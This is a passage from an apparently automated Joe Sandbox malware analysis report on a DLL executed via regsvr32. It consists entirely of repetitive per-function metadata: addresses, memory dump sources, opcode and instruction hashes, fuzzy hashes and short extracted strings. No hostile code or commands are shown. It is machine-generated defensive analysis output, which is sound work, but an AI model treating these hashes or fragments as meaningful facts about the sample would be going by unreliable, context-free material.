                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: tPR
                                                                                                                      • API String ID: 0-2373069265
                                                                                                                      • Opcode ID: 4818db55ac7a8e265a5f35a610ee8436687fb0bbca7f9ca296f5d5ec64c94d17
                                                                                                                      • Instruction ID: 71a7997d1ead779be7e0ce9c74a3df950b6dccaf10b88bc337cce367f6eb7800
                                                                                                                      • Opcode Fuzzy Hash: 4818db55ac7a8e265a5f35a610ee8436687fb0bbca7f9ca296f5d5ec64c94d17
                                                                                                                      • Instruction Fuzzy Hash: C141277091074D8BCB49CF68D48A6DE7BF0FB68388F209219F886E6250DB748595CFD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018002034C Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Jce
                                                                                                                      • API String ID: 0-1310344859
                                                                                                                      • Opcode ID: 82b123ef02bd0e71798e54f4a2c78b799cb3a3c9119ea8a4567b7d3c66b2d5ce
                                                                                                                      • Instruction ID: f4465259f16d8f415cac72d9973bb6299f15b5914aca61c632f630b0d4893266
                                                                                                                      • Opcode Fuzzy Hash: 82b123ef02bd0e71798e54f4a2c78b799cb3a3c9119ea8a4567b7d3c66b2d5ce
                                                                                                                      • Instruction Fuzzy Hash: 4841D4B050078A8BCF4CDF28C9965DE7BB5FB48348F044A2DF866AA350D3B49665CBC4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180018B80 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4=P
                                                                                                                      • API String ID: 0-3718286612
                                                                                                                      • Opcode ID: 8e803b738b2a828c5382fe1b56d7cf3adb5a74e63c084454cf55e9a1cf32c619
                                                                                                                      • Instruction ID: a8f2531d37c8363caa1aad1d9e236e59a8f46cb0bba7a8a5502bd0cb9c9efcac
                                                                                                                      • Opcode Fuzzy Hash: 8e803b738b2a828c5382fe1b56d7cf3adb5a74e63c084454cf55e9a1cf32c619
                                                                                                                      • Instruction Fuzzy Hash: 16414D7050064E8BCB59DF14D48A2DE3BE0FB28388F204219FC86D7291D778DA99DBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000F1D8 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X
                                                                                                                      • API String ID: 0-1684620495
                                                                                                                      • Opcode ID: 84d3d11f19006b63ab37fd0bfe008fd8b8b125f704ea51275f1a3c7a1f1f0d42
                                                                                                                      • Instruction ID: 76648a8bb03e03a05cd2c8ce239230228e25b1972e5f1b4755eb749e48668339
                                                                                                                      • Opcode Fuzzy Hash: 84d3d11f19006b63ab37fd0bfe008fd8b8b125f704ea51275f1a3c7a1f1f0d42
                                                                                                                      • Instruction Fuzzy Hash: 8D41A2B090034A8BCB48DF68D48A5DE7FB1FB68398F21461DFD16A6250D37496A8CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180012250 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: h}P
                                                                                                                      • API String ID: 0-1216288197
                                                                                                                      • Opcode ID: 84a4d61a42da1f51edcac172a3101b97c707e59eefbab1d5a02d52b46e76673c
                                                                                                                      • Instruction ID: 9456618e50480c69de1aee789d36f4583c4b86de9bff7617af87d8405f030e3e
                                                                                                                      • Opcode Fuzzy Hash: 84a4d61a42da1f51edcac172a3101b97c707e59eefbab1d5a02d52b46e76673c
                                                                                                                      • Instruction Fuzzy Hash: 6331E4706087848FC7A8DF28D48579BBBE1FB88314F508A6EE4C9D7261DB709949CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180022BA0 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @v7
                                                                                                                      • API String ID: 0-1308831661
                                                                                                                      • Opcode ID: 4fb8d82e7dd62ffa33a4d3e6e8011f908f7e92baa1fc886f90df757c7464e597
                                                                                                                      • Instruction ID: c9dafb603daa025cde3dcf2e2aa06e2f40ce78453b605f5258dab0cda0177ccd
                                                                                                                      • Opcode Fuzzy Hash: 4fb8d82e7dd62ffa33a4d3e6e8011f908f7e92baa1fc886f90df757c7464e597
                                                                                                                      • Instruction Fuzzy Hash: CF41ACB090038E8FCF48CF68C88A5DE7FB1FB18348F404A1DE866A6250D3B49665CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180003ED4 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: z[U
                                                                                                                      • API String ID: 0-4233267993
                                                                                                                      • Opcode ID: 5d2b3c17a7fc8d9a6559eadd97bcb1cd65db353f8752b5c9932d6af9fcaba772
                                                                                                                      • Instruction ID: 1089ee40c2b75a447c7de2f054715f6413e5fc39839455ed18423e87a3dc006e
                                                                                                                      • Opcode Fuzzy Hash: 5d2b3c17a7fc8d9a6559eadd97bcb1cd65db353f8752b5c9932d6af9fcaba772
                                                                                                                      • Instruction Fuzzy Hash: FE41A5B090078E8FDB48CF68C8495DE7BF0FB58358F104A19F86AA6650D7B4D664CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800259D8 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "u
                                                                                                                      • API String ID: 0-1278817916
                                                                                                                      • Opcode ID: 59f8f505f80c22a945ab5bf7f461bcccf9ee55834b2ae5d6943025df0176418d
                                                                                                                      • Instruction ID: c9c297cb883253826cf3c846531cf2ee63f2c3c3eb12fe00fce6ed51b89052a2
                                                                                                                      • Opcode Fuzzy Hash: 59f8f505f80c22a945ab5bf7f461bcccf9ee55834b2ae5d6943025df0176418d
                                                                                                                      • Instruction Fuzzy Hash: 7B41E07180034E8FCB48CF68C98A5DE7FF0FB58398F51461CE85AA6210D7B896A4CBC4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001EABC Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: =H
                                                                                                                      • API String ID: 0-4141749632
                                                                                                                      • Opcode ID: 79785acb7560eeac92d65bae4a5b4a14858041cb3df4db8b7a7bd0dfe9d407a7
                                                                                                                      • Instruction ID: 6ecda789b8ca993028385bdf2f20f06c1c154f447285568a41e10d6c9d8aa6f9
                                                                                                                      • Opcode Fuzzy Hash: 79785acb7560eeac92d65bae4a5b4a14858041cb3df4db8b7a7bd0dfe9d407a7
                                                                                                                      • Instruction Fuzzy Hash: AA31D6B090034E8BCF48CF68C4965DE7FB0FB58398F14461DE856A6250D3B896A4CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800089DC Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "W^
                                                                                                                      • API String ID: 0-3181509884
                                                                                                                      • Opcode ID: 3625eec244765ae128aa1b985c6d7d21b8410776620582e754260a87434e0f98
                                                                                                                      • Instruction ID: d3dee1a6ed208e399b2354ee7e22f0ff5e838c15e4bfac6f477bfdfdde0c0671
                                                                                                                      • Opcode Fuzzy Hash: 3625eec244765ae128aa1b985c6d7d21b8410776620582e754260a87434e0f98
                                                                                                                      • Instruction Fuzzy Hash: 4941C2B190034A8BCB48CF28C4865DE7FB0FB68398F114619F85AA6250D7B896A4CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800138F0 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X
                                                                                                                      • API String ID: 0-1684620495
                                                                                                                      • Opcode ID: 53411ff0043618e283992c4f4fea215528bc53d6ab6ea16d2073080366889f7a
                                                                                                                      • Instruction ID: e4657bf1e222ab69f2ebb4ad410f11f33904ad55955fc654133dae7778857ba2
                                                                                                                      • Opcode Fuzzy Hash: 53411ff0043618e283992c4f4fea215528bc53d6ab6ea16d2073080366889f7a
                                                                                                                      • Instruction Fuzzy Hash: C83116B190034E8BCB4CCF68C4965EE7FB1FB54358F11461CF85A9A250D7B49AA4CBC4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000D490 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: cNA
                                                                                                                      • API String ID: 0-3673276390
                                                                                                                      • Opcode ID: 3b86be78ee3254c173f5139cb17245b9e6c03df80cb14a782ae325b6b3becf33
                                                                                                                      • Instruction ID: 0baa392dd3c7f249919686d235ab909ed6574d81c122e4fd0ad74e2ae4a89866
                                                                                                                      • Opcode Fuzzy Hash: 3b86be78ee3254c173f5139cb17245b9e6c03df80cb14a782ae325b6b3becf33
                                                                                                                      • Instruction Fuzzy Hash: 754190B090074E8BCF89CF64C48A5CE7FB0FB28398F200619E85596250D3B496A5CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001E970 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: L8
                                                                                                                      • API String ID: 0-1649853053
                                                                                                                      • Opcode ID: c02a5f08d8cb81ff3a01b97ccc002f179eb97da066e427d9fb6e071bb2570d4b
                                                                                                                      • Instruction ID: 2b74a7649b1a64e7825447dc9da1b8301d3a6d05397f9c720543eb4fdc9c7f10
                                                                                                                      • Opcode Fuzzy Hash: c02a5f08d8cb81ff3a01b97ccc002f179eb97da066e427d9fb6e071bb2570d4b
                                                                                                                      • Instruction Fuzzy Hash: 3E41B4B181075E8FCB44DF64D48A5CE7FF0FB68398F201619F849A6260D3B496A4CBD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001018C Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: l"
                                                                                                                      • API String ID: 0-4162449875
                                                                                                                      • Opcode ID: 4aa6842d3ce6096ca6bcc89522ee092a351a9426a29944682b07f7013063f854
                                                                                                                      • Instruction ID: 0cad62ed6c05024657d3901a13a70a97c7fed43324ac3cc9972d97c61628614f
                                                                                                                      • Opcode Fuzzy Hash: 4aa6842d3ce6096ca6bcc89522ee092a351a9426a29944682b07f7013063f854
                                                                                                                      • Instruction Fuzzy Hash: 7031D1B090074E8FCB58CF68C88A5DE7BF0FB58358F114619E959A6240D3B896A8CBD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180024C44 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *42^
                                                                                                                      • API String ID: 0-2886399368
                                                                                                                      • Opcode ID: 8d47aaf7e91c2064823ad72c2628bf6a3ee8809ab9e023cb99295748fa011138
                                                                                                                      • Instruction ID: c2e51d988f4e79c0116153a4a948c308d54fb409acdf9a24f75b2a0e99388d47
                                                                                                                      • Opcode Fuzzy Hash: 8d47aaf7e91c2064823ad72c2628bf6a3ee8809ab9e023cb99295748fa011138
                                                                                                                      • Instruction Fuzzy Hash: 393182B5529381AB8788DF28D09581EBBE1FBC9304FC06E1DF9868B260D375E405CB46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000D288 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: z
                                                                                                                      • API String ID: 0-1657960367
                                                                                                                      • Opcode ID: 46a91f0c1077132480486274e3e940e14178b8bdc35d5bb6c4d0042ea1e30017
                                                                                                                      • Instruction ID: 185dcc7a676a4e8653741c4af792f5f974fb92a25d2c76856c764b4e4c270a2a
                                                                                                                      • Opcode Fuzzy Hash: 46a91f0c1077132480486274e3e940e14178b8bdc35d5bb6c4d0042ea1e30017
                                                                                                                      • Instruction Fuzzy Hash: 7F2148B46183808BD348DF28C05A51ABBF1FBCC31CF414B2DF4CAA6251D7BC96458B4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001973C Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :,#
                                                                                                                      • API String ID: 0-1307288456
                                                                                                                      • Opcode ID: 606bbe6bffcc1c60fba7cdd790d8e46e6e1e6052ed82328e5c4aed2f2dd454e5
                                                                                                                      • Instruction ID: 94ede304cb048fdfa13ec708d8b4a0072234cf7431396941c9b159105a2600bc
                                                                                                                      • Opcode Fuzzy Hash: 606bbe6bffcc1c60fba7cdd790d8e46e6e1e6052ed82328e5c4aed2f2dd454e5
                                                                                                                      • Instruction Fuzzy Hash: A62192B0529781AFC788DF28D59592EBBF1FBC9344F806A1DF8868B354D3749449CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000E474 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 3|ya
                                                                                                                      • API String ID: 0-1517914646
                                                                                                                      • Opcode ID: e15e8305a4ae1c314a521c46750a3c031fbf99b2d0527ac465854a8591e6f9fc
                                                                                                                      • Instruction ID: 7751f22b8b86458984bbb423ff0d17d66e4935a442e85e56702490e29ba09b12
                                                                                                                      • Opcode Fuzzy Hash: e15e8305a4ae1c314a521c46750a3c031fbf99b2d0527ac465854a8591e6f9fc
                                                                                                                      • Instruction Fuzzy Hash: 4E314DB4528781AFC788DF29D48A91BBBF1FBD9344F806A1DF8858A260D774D445CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018000E778 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &#
                                                                                                                      • API String ID: 0-1001481341
                                                                                                                      • Opcode ID: e6e901166304b886cf8d9a2d0d42a1746cda46259d78b94372d9337f973ab477
                                                                                                                      • Instruction ID: 6b6752f4dd7a184f3ac43f6e09b5fe2e62bf86d2d65bf3b5f6c277835aecb293
                                                                                                                      • Opcode Fuzzy Hash: e6e901166304b886cf8d9a2d0d42a1746cda46259d78b94372d9337f973ab477
                                                                                                                      • Instruction Fuzzy Hash: 002170B452C781AFC798DF28D49A91BBBF0BB89314F806A2DF9C68A350D774D445CB02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180023EFC Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8~
                                                                                                                      • API String ID: 0-2219888732
                                                                                                                      • Opcode ID: 6c6a68d78e732db9cb0267ba69b0bb3566233d81e19c6f9574c6cdf6a8d67d78
                                                                                                                      • Instruction ID: 989fd17308a9f315c6b1028d2d5c1b23b1a828ae388f3b57cea0a4d299a70aee
                                                                                                                      • Opcode Fuzzy Hash: 6c6a68d78e732db9cb0267ba69b0bb3566233d81e19c6f9574c6cdf6a8d67d78
                                                                                                                      • Instruction Fuzzy Hash: 29217275528780AF8388DF28C19A91FBBF0BB99304F906A5DF88697350D374D445CB02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180017BB0 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: {m
                                                                                                                      • API String ID: 0-469313860
                                                                                                                      • Opcode ID: 763f21fe802a908abd280f5913e6565b69b5e5df79e6dffdc95eccaa685d3074
                                                                                                                      • Instruction ID: f072e8dae857bdb434c0bc5d5440d3ada07f4cf1b49c50907f101e76f5e932a4
                                                                                                                      • Opcode Fuzzy Hash: 763f21fe802a908abd280f5913e6565b69b5e5df79e6dffdc95eccaa685d3074
                                                                                                                      • Instruction Fuzzy Hash: 3821C2B0518B848BE368DF38C48A60BBFF1BBC5384F60891DF6A686260D7759844CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00000001800105EC Relevance: .2, Instructions: 235COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3f92a2aadf2226ce81c8b45262377bb6f520a34079752e835c5fac809d4bd5c7
                                                                                                                      • Instruction ID: 04d017e55697a8ac56006cf421349b9bc26f49318d78393da174c1ffd40e1e1d
                                                                                                                      • Opcode Fuzzy Hash: 3f92a2aadf2226ce81c8b45262377bb6f520a34079752e835c5fac809d4bd5c7
                                                                                                                      • Instruction Fuzzy Hash: 70B15B7050474D8BDF88DF14C89A6DA3BE1FB58388F118228FC8AA7260C778D995CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000000018001FD90 Relevance: .2, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6427a3999e541a1048ab08742b03aaa732079d3aa38450cf56915438c2fc6a49
                                                                                                                      • Instruction ID: 23c33ba49ea1218cc1464a0b6e5be3611069880530f38c941a0decd40d6e7856
                                                                                                                      • Opcode Fuzzy Hash: 6427a3999e541a1048ab08742b03aaa732079d3aa38450cf56915438c2fc6a49
                                                                                                                      • Instruction Fuzzy Hash: 5D810271D146188BDF98CFA8D489AEEBBF0FB48314F10816EE846F6250DB748949CF65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180022FF4 Relevance: .1, Instructions: 137COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: aef0e26c80839b57e769d27a7eb468bdce7d88e35a1025a668d81a99c6129cd3
                                                                                                                      • Instruction ID: 837cafca10d5730f321188398ff74f061dd4aa1eed1e00ce3042537172573164
                                                                                                                      • Opcode Fuzzy Hash: aef0e26c80839b57e769d27a7eb468bdce7d88e35a1025a668d81a99c6129cd3
                                                                                                                      • Instruction Fuzzy Hash: 87511E7150468C9BDBBACE24D8AA3ED37A1FB48344F50812DE90E8E290DF749B48DB41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180009248 Relevance: .1, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2d217484348aa66d15106dc967b42cf978a3b4c04cb90f4ae6d1357bf1ee3a4b
                                                                                                                      • Instruction ID: 039fc9b2ec6cd845b2a1f9d27cbce1b3029e5112a518c2385a16010d2a65ef4e
                                                                                                                      • Opcode Fuzzy Hash: 2d217484348aa66d15106dc967b42cf978a3b4c04cb90f4ae6d1357bf1ee3a4b
                                                                                                                      • Instruction Fuzzy Hash: 566164B551674CCFDB88CF28D28A5CA3BE1FF58318F004129FC1A9A265D7B5E568CB09
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0000000180025E0C Relevance: .1, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
